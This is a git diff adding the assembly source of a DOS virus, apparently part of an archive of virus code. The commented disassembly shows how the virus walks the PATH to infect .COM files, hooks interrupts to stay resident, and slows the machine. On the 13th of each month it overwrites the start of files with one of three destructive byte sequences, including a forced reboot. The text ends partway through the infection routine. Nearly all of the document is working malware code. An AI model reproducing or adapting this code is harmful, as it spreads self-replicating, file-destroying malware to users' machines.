; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

785
MSDOS/Virus.MSDOS.Unknown.time.asm Normal file
View File

@ -0,0 +1,785 @@
; Start disassembly
DATA_1E EQU 64H ; (761D:0064=0)
DATA_2E EQU 66H ; (761D:0066=0)
DATA_3E EQU 68H ; (761D:0068=0)
DATA_10E EQU 4F43H ; (761D:4F43=0)
DATA_11E EQU 504DH ; (761D:504D=0)
SEG_A SEGMENT
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
Time PROC FAR
start:
JMP Virus_Entry_Point ;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Original Program without 1st three bytes... ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
DATA_5 DB 9987 DUP (90H)
MOV AH,4CH ;
MOV AL,DATA_2 ; Terminate to DOS with
INT 21H ; exitcode AL
DB 0
DATA_2 DB 0
DB 0
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Virus Entry Point ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Virus_Entry_Point:
JMP SHORT Set_Virus_Data_Point
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set Virus Data Storage Point ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Set_Virus_Data_Point:
PUSH CX ; Store CX
MOV DX,2B2DH ;
MOV SI,DX ; SI points at start of
; virus data
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Get DTA Address ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
PUSH ES ; Store ES
MOV AH,2FH ; GET DTA address into
INT 21H ; ES:BX
MOV [SI],BX ; Store BX of DTA
MOV [SI+2],ES ; Store ES of DTA
POP ES ; Restore ES
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set new DTA Address ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV DX,4EH ;
ADD DX,SI ;
MOV AH,1AH ;
INT 21H ; Set new DTA to DS:DX
PUSH SI ; Store SI
CLD ; Clear direction
MOV DI,SI ;
ADD SI,0AH ;
ADD DI,81H ;
MOV CX,3 ; Move 3 bytes from source
REP MOVSB ; to destination (E9h, 45h
; 45h)
POP SI ; Restore SI
PUSH ES ; Store ES
PUSH SI ; Store SI
PUSH BX ; Store BX
MOV BX,2CH
MOV AX,[BX] ; Get Extra Segment?
POP BX ; Restore BX
MOV ES,AX
MOV DI,0
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Search for the PATH ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Search_For_Path:
POP SI ; Restore SI
PUSH SI ; Store SI
ADD SI,1AH ;
LODSB ; Load the 'M' into AL
MOV CX,8000H ;
REPNE SCASB ;
MOV CX,4 ;
Path_Loop:
LODSB ;
SCASB ;
JNZ Search_For_Path ;
LOOP Path_Loop ; Pitty, PATH not yet found.
POP SI ; Restore SI
POP ES ; Restore ES
MOV [SI+16H],DI ; Store address of PATH
MOV BX,SI ; Temp. Storage of SI
ADD SI,26H ;
MOV DI,SI ;
JMP SHORT Find_First_FileName
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Error:
CMP WORD PTR [SI+16H],0
JNE Set_Virus_Path ;
JMP Restore_Org_DTA ; Error occured. Restore
; original DTA,
; 1st three bytes and
; execute original
; program.
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Start Searching for PATH ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Set_Virus_Path:
PUSH DS ; Store Registers
PUSH SI
PUSH AX
PUSH ES
PUSH ES
POP DS ; DS=ES
PUSH BX
MOV BX,2CH
MOV AX,[BX]
POP BX ; Restore BX
MOV [SI+1FH],AX ;
MOV DI,SI ;
MOV AX,[DI+16H] ; Org.address of PATH
MOV SI,AX ;
MOV DS,[DI+1FH] ;
POP ES ;
POP AX ;
ADD DI,26H ;
Reached_EO_Path:
LODSB ; Get byte into AL
CMP AL,3BH ; Path Delimiter ';' reached?
JE Delimiter_Reached ; Yes
CMP AL,0 ; End of Path reached?
JE EO_Path_Reached ; Yes
STOSB ; Store byte in AL
JMP SHORT Reached_EO_Path ;
EO_Path_Reached:
MOV SI,0 ;
Delimiter_Reached:
POP BX ;
POP DS ;
MOV [BX+16H],SI ;
CMP BYTE PTR [DI-1],5CH ; Is the PATH closed by
; a backslash?
JE Find_First_FileName ; Yes
MOV AL,5CH ;
STOSB ; Place Backslash
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Find First Filename ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Find_First_FileName:
MOV [BX+18H],DI ; Store at which address
; the path starts
; BX=SI
MOV SI,BX ; Restore SI
ADD SI,10H ;
MOV CX,6 ;
REP MOVSB ; Set Search.Spec.
MOV SI,BX ; Restore SI
MOV AH,4EH ;
MOV DX,26H ;
ADD DX,SI ; Filename:= *.COM
MOV CX,3 ; Search Attributes:
; Read Only/Hidden
INT 21H ; Find 1st Filename to
; match with DS:DX
JMP SHORT Error_Handler ;
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Find Next Filename ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Find_Next_FileName:
MOV AH,4FH ;
INT 21H ; Find next Filename to
; match with DS:DX
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Error Handler ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Error_Handler:
JNC Check_Filelength ; Jump if carry=0, so
; no errors
JMP SHORT Error ; Carry Set, so error
; occured
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Check Filelength and look if file is already infected. ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Check_Filelength:
MOV AX,DS:DATA_1E[SI] ; (761D:0064=0)
AND AL,1FH
CMP AL,7
JE Find_Next_FileName ; File already infected.
CMP WORD PTR DS:DATA_3E[SI],0FA00H
; Is the length of the
; file more as FA00h bytes?
JA Find_Next_FileName ; Yes.
CMP WORD PTR DS:DATA_3E[SI],0F00H
; Is the length of the
; file less as 0F00h bytes?
JB Find_Next_FileName ; Yes
MOV DI,[SI+18H] ; Get address of path of virus
PUSH SI ; Store SI
ADD SI,6CH
Set_FileName:
LODSB ; Set up Filename for
STOSB ; infection.
CMP AL,0 ; End Of Filename Reached?
JNE Set_FileName ; No
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set Temporary File attributes ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
POP SI ; Restore SI
MOV CX,[SI+63H] ;
MOV CH,0 ;
MOV [SI+8],CX ; Get File-Attributes
MOV AX,CX ;
MOV CX,0FFFEH ;
AND AX,CX ; Remove Read-Only Attribute
MOV CX,AX ;
MOV AX,4301H ;
MOV DX,26H ;
ADD DX,SI ;
INT 21H ; Set File-Attributes
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Open the File ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV AX,3D02H ; Open the file for both
INT 21H ; reading and writing
JNC Give_Infection_Marker ; If no error occured...
JMP Set_FileAttributes_Back ; Error occured
Give_Infection_Marker:
MOV BX,AX
MOV CX,DS:DATA_2E[SI] ; (761D:0066=0)
MOV [SI+6],CX
MOV CX,DS:DATA_1E[SI] ; (761D:0064=0)
AND CL,0E0H
OR CL,7
MOV [SI+4],CX
JMP SHORT Get_Current_Time ; (2967)
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ This Part will be installed resident after hooking INT 20h ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
PUSHF ; Push flags
PUSH DS
PUSH ES
PUSH SS
PUSH AX
PUSH BX
PUSH DX
PUSH DI
PUSH SI
PUSH BP
MOV DX,43H
MOV AL,74H ; This will change the refesh
OUT DX,AL ; rate, thus slowing down the
MOV DX,41H ; PC. Every normal program-
MOV AL,8 ; termination by calling
OUT DX,AL ; INT 20h will call this
MOV AL,7 ; rourtine
OUT DX,AL ;
POP BP
POP SI
POP DI
POP DX
POP BX
POP AX
POP SS
POP ES
POP DS
POPF ; Pop flags
JMP CS:DATA_5 ; (761D:0253=9090H)
; JMP to org. INT 20h address
ADD [BX+SI],AL
ADD [BX+SI],AL
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Get Current Time ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Get_Current_Time:
PUSH AX ; Store all registers
PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
PUSH SI
PUSH DI
PUSH BP
MOV AH,2CH ; Get current time into CX:DX
INT 21H ; CX=hrs/min, DX=sec/hund.sec
CMP DL,32H ; Are we above 32/100 seconds?
JA Get_INT_F2_Vector ; Yes
JMP Start_Trigger_Check ; No
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Get Interrupt Vector of INT F2h ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Get_INT_F2_Vector:
MOV AH,35H ; Get the interrupt vector of
MOV AL,0F2H ; INT 0F2h into ES:BX
INT 21H ;
CMP BX,7777H ; Was INT F2 already hooked?
JNE Allocate_Memory ; No
JMP INT_F2_Already_Hooked ;
Allocate_Memory:
MOV AX,DS ;
DEC AX ;
MOV ES,AX ;
MOV BX,0 ;
CMP BYTE PTR ES:[BX],5AH ;
JE Memory_Already_Allocated
PUSH BX ;
MOV AH,48H ; Allocate 4096 16-byte-para-
MOV BX,0FFFFH ; graphs in memory. ???
INT 21H ;
CMP BX,5 ; Is the largest available
; 5 or higher?
JAE Again_Allocate_Memory ; Yes
JMP Start_Trigger_Check ; No
Again_Allocate_Memory:
MOV AH,48H ; Again allocate memory
INT 21H ;
POP BX ;
JNC Segment_Decrease ; If there was no error when
; allocating memory the last
; time
JMP Start_Trigger_Check ; If there was an error
Segment_Decrease:
DEC AX ; Decrease Segment of Allcated
; memory
MOV ES,AX ;
MOV BX,1 ;
MOV WORD PTR ES:[BX],0 ;
MOV BX,0 ;
CMP BYTE PTR ES:[BX],5AH ;
JE Memory_Allocated ;
JMP SHORT Start_Trigger_Check
NOP ;
Memory_Allocated:
MOV BX,3 ;
ADD AX,ES:[BX] ;
INC AX ;
MOV BX,12H ;
MOV ES:[BX],AX ;
Memory_Already_Allocated:
MOV BX,3 ;
MOV AX,ES:[BX] ;
SUB AX,5 ;
JC Start_Trigger_Check ; Jump if carry Set
MOV ES:[BX],AX ;
MOV BX,12H ;
SUB WORD PTR ES:[BX],5 ;
MOV ES,ES:[BX] ;
PUSH SI ; Store SI
SUB SI,1F2H ; SI points to the part
MOV DI,0 ; which must become
MOV CX,46H ; resident.
REP MOVSB ; Move the 46h bytes from
; [SI] to ES:[DI]
POP SI ; Restore SI
MOV BP,ES ;
PUSH CS ;
POP ES ; Restore ES
MOV AH,25H ; Hook interrupt F2h
MOV AL,0F2H ; New INT-vector will
MOV DX,7777H ; be DS:7777h
INT 21H ;
JMP SHORT Hook_INT_20h ; (2A10)
NOP
INT_F2_Already_Hooked:
JMP SHORT Start_Trigger_Check
NOP
Hook_INT_20h:
MOV AL,20H ;
MOV AH,35H ; Get the INT 20h Vector
INT 21H ; into ES:BX
MOV DX,ES ;
MOV ES,BP ;
PUSH SI ;
MOV AX,SI ;
SUB AX,1CAH ;
MOV DI,SI ;
SUB DI,1F2H ;
SUB AX,DI ;
MOV SI,AX ;
MOV ES:[SI],BX ;
ADD SI,2 ;
MOV ES:[SI],DX ;
SUB SI,4 ;
MOV ES:[SI],AX ;
POP SI ;
PUSH CS ;
POP ES ;
MOV AH,25H ; Install new INT 20h
MOV DS,BP ; vector to DS:DX
MOV DX,0 ; (=DS:00)
MOV AL,20H ;
INT 21H ;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Start Trigger Check ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Start_Trigger_Check:
POP BP ; Restore Registers
POP DI
POP SI
POP ES
POP DS
POP DX
POP CX
POP BX
POP AX
MOV AH,2AH ; Get the current date
INT 21H ; CX=year, DX=mon/day
CMP DL,0DH ; Is it the 13th of the month?
JNE Start_Infecting_File ; No
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ It is the 13th of the Month... Select 1 out of 3 destructions ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV AH,2CH ; Get current time
INT 21H ; CX=hrs/min, DX=sec/hund.sec
CMP DL,3CH ; Are we above 60/100 seconds?
JA Destruction_2 ; Yes
CMP DL,1EH ; Are we above 30/100 seconds?
JA Destruction_3 ; Yes
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Destruction Scheme 1: Place the following code at the begining of a ÛÛ
;ÛÛ file: MOV AH,00 ÛÛ
;ÛÛ INT 20h ÛÛ
;ÛÛ NOP ÛÛ
;ÛÛ ÛÛ
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
;ÛÛ will terminate at once with returning to DOS. ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV DX,SI
ADD DX,21H
JMP SHORT Write_5_Destruction_Bytes
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Destruction Scheme 2: Place the following code at the begining of a ÛÛ
;ÛÛ file: HLT ÛÛ
;ÛÛ HLT ÛÛ
;ÛÛ HLT ÛÛ
;ÛÛ HLT ÛÛ
;ÛÛ DB CDh (which is the opcode for INT) ÛÛ
;ÛÛ ÛÛ
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
;ÛÛ will execute the 4 HLT's and then perform an INT-Call depending on ÛÛ
;ÛÛ the byte following CDh. This can be any INT-Call. So this scheme ÛÛ
;ÛÛ can be consisered the dangeroust of all three destruction schemes. ÛÛ
;ÛÛ will terminate at once with returning to DOS. The first five bytes ÛÛ
;ÛÛ of a file will be overwritten always, making the file useless, but ÛÛ
;ÛÛ issuing and 'random' INT-Call can do much more harm. ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Destruction_2:
MOV DX,SI
ADD DX,79H
JMP SHORT Write_5_Destruction_Bytes
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Destruction Scheme 3: Place the following code at the begining of a ÛÛ
;ÛÛ file: INT 19h ÛÛ
;ÛÛ INT 19h ÛÛ
;ÛÛ DB ? (Can be anything. It is the 1st byte of the org.file) ÛÛ
;ÛÛ ÛÛ
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
;ÛÛ will cause a reboot without a memory test and preserving the ÛÛ
;ÛÛ interrupt vectors. If any interrupt vector from 00h through 1Ch has ÛÛ
;ÛÛ been set, the system most likely will hang itself, because of this ÛÛ
;ÛÛ preserving. ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Destruction_3:
MOV DX,SI
ADD DX,7DH
JMP SHORT Write_5_Destruction_Bytes
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Write the 5 bytes with the destruction to the begining of the file ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Write_5_Destruction_Bytes:
MOV AH,40H ;
MOV CX,5 ;
INT 21H ; Write 5 bytes to the file
JMP SHORT Set_FileDate_Time_Back
NOP
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ It is not the 13th of the month... Infect the file ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Start_Infecting_File:
MOV AH,3FH ;
MOV CX,3 ; Number of bytes to read
MOV DX,0AH ;
ADD DX,SI ;
INT 21H ; Read the bytes from the file
; and put them at DS:DX
JC Set_FileDate_Time_Back ; If Error Occurred
CMP AL,3 ; 3 Bytes read?
JNE Set_FileDate_Time_Back ; No
MOV AX,4202H ; Set the Read/Write
MOV CX,0 ; pointer to the EOF at
MOV DX,0 ; offset CX:DX (=00:00)
INT 21H ;
MOV CX,AX ; CX=Length of File
SUB AX,3 ;
MOV [SI+0EH],AX ; Store Length -3 bytes
ADD CX,41DH ; CX=CX+41Dh
MOV DI,SI
SUB DI,318H
MOV [DI],CX ; Set new Virus Data Area
; Address into code
MOV AH,40H ;
MOV CX,3ABH ; CX=3ABh The length of the
; viral-code written to disk.
MOV DX,SI
